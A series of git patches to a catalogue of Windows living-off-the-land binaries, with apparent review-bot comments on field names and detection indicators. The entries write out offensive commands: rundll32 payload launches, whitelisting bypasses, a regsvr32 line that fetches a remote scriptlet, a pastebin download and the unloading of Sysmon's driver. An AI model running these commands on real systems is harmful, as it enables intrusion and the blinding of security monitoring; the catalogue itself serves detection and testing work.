@@ -6,14 +6,14 @@ Created: 2018-05-25 Commands: - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). - Categories: Execution + Category: Execution Privileges: User MitreID: T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064 OperatingSystem: Windows - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). - Categories: Execution + Category: Execution Privileges: User MitreID: T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064 From 5012f9515221c2e99d50a98685461b2a7fd524b9 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:49:30 +0000 Subject: [PATCH 06/19] Fix Code_Sample field --- yml/OSBinaries/Eventvwr.yml | 2 +- yml/OSBinaries/Wsreset.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index ead74be..e19150e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe -Code Sample: +Code_Sample: - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Detection: - IOC: eventvwr.exe launching child process other than mmc.exe diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 84edaf6..9c00099 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\wsreset.exe -Code Sample: +Code_Sample: - Code: Detection: - IOC: wsreset.exe launching child process other than mmc.exe From 2e08819eef2763cc703d61b1aad0945fd090d16a Mon Sep 17 00:00:00 2001 
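Review bot: the Testxlst.yml hunk renames the per-command key to `Category` but keeps the value `Execution`, while every other command on this page uses `Category: Execute` (Url.yml, Zipfldr.yml, Advpack.yml); changing the value together with the key keeps the category set to one spelling, otherwise anything filtering on `Execute` silently misses these two entries.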
From: Wietze Date: Sun, 10 Jan 2021 15:54:00 +0000 Subject: [PATCH 07/19] Fix Usecase field --- yml/OSLibraries/Advpack.yml | 10 +++++----- yml/OSLibraries/Ieadvpack.yml | 10 +++++----- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 6 +++--- yml/OSLibraries/Syssetup.yml | 4 ++-- yml/OSLibraries/Url.yml | 12 ++++++------ yml/OSLibraries/Zipfldr.yml | 4 ++-- 11 files changed, 29 insertions(+), 29 deletions(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index cca0d1b..56fe679 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -30,14 +30,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ef48be6..e5a1c05 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 
@@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -30,14 +30,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 19832be..c2996d4 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml 
@@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 63b335a..1ea9d18 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). - UseCase: Launch an HTA application. + Usecase: Launch an HTA application. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 8a96d19..01162da 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index a5b1655..59036f1 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml 
@@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7aeb700..30bd365 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index d4f554c..3b41678 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
@@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -14,14 +14,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 9f8cb02..6dbfe1c 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). + Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). Category: AWL Bypass Privileges: User MitreID: T1085 
@@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index d8164b6..e58d7ca 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. + Usecase: Load an executable payload by calling a .url file with or without quotes. Category: Execute Privileges: User MitreID: T1085 @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1085 
@@ -30,7 +30,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 @@ -38,7 +38,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1085 @@ -46,7 +46,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d72ecf1..eafe22f 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 
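Review bot: the Syssetup.yml line being rewritten still carries the unpunctuated aside in `Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).`; since the line is touched anyway, bring it in line with the Mshtml.yml wording `(Note - Pops a security warning ...)` by writing `(Note - May pop an error window)`. The `UseCase` to `Usecase` rename itself is applied consistently across all 29 changed lines in the 11 files, but key-casing drift of this kind is exactly what a schema check catches; consider a CI step that validates every yml file against the expected key set, so a mis-cased key fails the build instead of going unnoticed until someone reads the rendered page.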
From 3ca7bdc5422c3fe710ff54fc18401e9b5b61f190 Mon Sep 17 00:00:00 2001 From: ahmad Date: Fri, 22 Jan 2021 06:33:58 -0500 Subject: [PATCH 08/19] Fixed the url --- yml/OtherMSBinaries/Adplus.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index d3095d9..9857834 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -20,7 +20,7 @@ Code_Sample: Detection: - IOC: Resources: - - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' From 84de927a839510b52bbbd4b04c82be12ed222d03 Mon Sep 17 00:00:00 2001 From: SpookySec Date: Mon, 8 Feb 2021 16:28:25 +0300 Subject: [PATCH 09/19] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..a5edabc 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe 
@@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@spooky_sec' +--- From d539a7dacd33bdcb7bde8056dedcb5f86ceab4de Mon Sep 17 00:00:00 2001 From: SpookySec Date: Fri, 12 Feb 2021 22:26:16 +0300 Subject: [PATCH 10/19] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index a5edabc..32830c2 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -40,5 +40,5 @@ Acknoledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Spooky Sec - Handle: '@spooky_sec' + Handle: '@sec_spooky' --- From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:35:06 -0500 Subject: [PATCH 11/19] Create IMEWDBLD.yml --- yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/IMEWDBLD.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml 
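Review bot: the new Commands entry in Cdb.yml leaves `MitreID:` and `MitreLink:` empty while the existing entry immediately above it in the same hunk carries `MitreID: T1218` and its link; fill both in (if the same technique applies) so the entry is tagged and filterable like the others. The command value `cdb.exe -pd -pn` also reads as incomplete, since `-pn` takes an argument and a bracketed placeholder may have been lost in transit; confirm against the source before merging. In the second hunk the block key `Acknoledgement:` is misspelled (every other file in this series uses `Acknowledgement:`), and since the patch already edits that block this is the moment to correct the key. The follow-up commit that only changes the handle to `'@sec_spooky'` should be squashed into this one.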
@@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From bbf14cf4b9ed7d9e2c680632590551bb9972095c Mon Sep 17 00:00:00 2001 From: Parker McGee <232132+pgmcgee@users.noreply.github.com> Date: Sat, 20 Mar 2021 16:40:37 -0400 Subject: [PATCH 12/19] Fix a typo in Findstr.yml `finstr.exe` should be `findstr.exe` --- yml/OSBinaries/Findstr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..35f823c 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -42,11 +42,11 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- 
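Review bot: `Created: '2020-03-05'` in the new IMEWDBLD.yml conflicts with the commit date (5 Mar 2021) and looks like a year typo for `2021-03-05`. The Description is a single run-on sentence and the file-name portion after each `<8_RANDOM_ALNUM_CHARS>` folder appears truncated (`/[1].`), likely a stripped placeholder; split the sentence at `, if provided a URL` and re-check the cache-path wording against the source. Unlike the other entries in this series the file has no `Code_Sample:` or `Detection:` block; given that the documented behaviour is an outbound download into the INetCache folder, an `IOC` such as IMEWDBLD.exe making a network connection, or being started with a URL on its command line, would give defenders something concrete to alert on.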
From ebf494ae4debab34e6f1d92d6613792ba79fbcb5 Mon Sep 17 00:00:00 2001 From: Efraim-Kaplan <54638674+Efraim-Kaplan@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:33:53 -0400 Subject: [PATCH 13/19] FIxed typo Replaced "handeling" with "handling". --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..414e531 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: '2018-05-25' Commands: From 87c3319ad4797c1160b259f82fcb0330fa312816 Mon Sep 17 00:00:00 2001 From: Josh Brower Date: Tue, 6 Jul 2021 13:56:24 -0400 Subject: [PATCH 14/19] Fix ART link --- yml/OSBinaries/Cmd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..a951c7a 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS From ecbc2f817f20c8687cdd0c3a60a584004958f751 Mon Sep 17 00:00:00 2001 
From: John Lambert Date: Sat, 18 Sep 2021 17:43:59 -0700 Subject: [PATCH 15/19] Add lolbin for fltMC.exe Used by redteams for defense evasion to disable drivers used by agents like sysmon https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon https://github.com/oddcod3/Phantom-Evasion/blob/master/Modules/post-exploitation/Postex_CMD_UnloadSysmonDriver_windows.py --- yml/OSBinaries/fltMC.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/fltMC.yml diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml @@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- From 559d9bc3ff0969f450ec2adb8423f63a25b8e7fe Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:01 +0800 Subject: [PATCH 16/19] Create VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/VSIISExeLauncher.yml diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..5c92f3d 
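Review bot: `Category: ADS` in the new fltMC.yml does not describe what the entry documents; the Usecase says `Defense evasion` and the command unloads a minifilter driver, which has nothing to do with alternate data streams, so use the category that matches the use case. `MitreID: T1562` and `MitreLink: .../T1562/002/` also disagree (the link names a sub-technique the ID does not); decide which sub-technique is intended and make both fields match. The `IOC: 4688 events with fltMC.exe` is weaker than it needs to be: 4688 from the Security log is the right source here because it does not depend on the driver this command removes, but it only carries the command line when process command-line auditing is enabled, so state that prerequisite and key the indicator on the `unload` verb so that routine `fltMC.exe filters` queries do not fire.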
--- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: +Acknowledgement: + - Person: timwhite + Handle: +--- From 9336b4d599c241d86720a6e9b833f9dc173d4cd4 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:39 +0800 Subject: [PATCH 17/19] Update VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 5c92f3d..33d36a5 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -19,7 +19,7 @@ Code_Sample: Detection: - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - - Link: + - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite Handle: From b5357cdec00bbfe4e714fa227da2230a27d70918 Mon Sep 17 00:00:00 2001 
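Review bot: the new VSIISExeLauncher.yml leaves `Handle:` empty under Acknowledgement and, after the follow-up commit, points `Resources:` at a GitHub profile (`https://github.com/timwhitez`) rather than a write-up of the behaviour; either cite a post describing the `-p`/`-a` launch or leave the link out. `Description: ... Part of VS/VScode installation.` and `OperatingSystem: Windows 10 and up with VS/VScode installed` are not supported by the entry's own Full_Path, which is a Visual Studio 2019 Community `Web Tools\ProjectSystem` path; drop the VScode claim unless a path under a VS Code install can be cited, and add the other edition paths if known. The `IOC: VSIISExeLauncher.exe spawned an unknown process` is reasonable but vague; stating the relationship explicitly (VSIISExeLauncher.exe as parent of a process outside the IDE tool chain) makes it usable in a detection rule. The two commits should be squashed, since the second only fills a field the first left blank.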
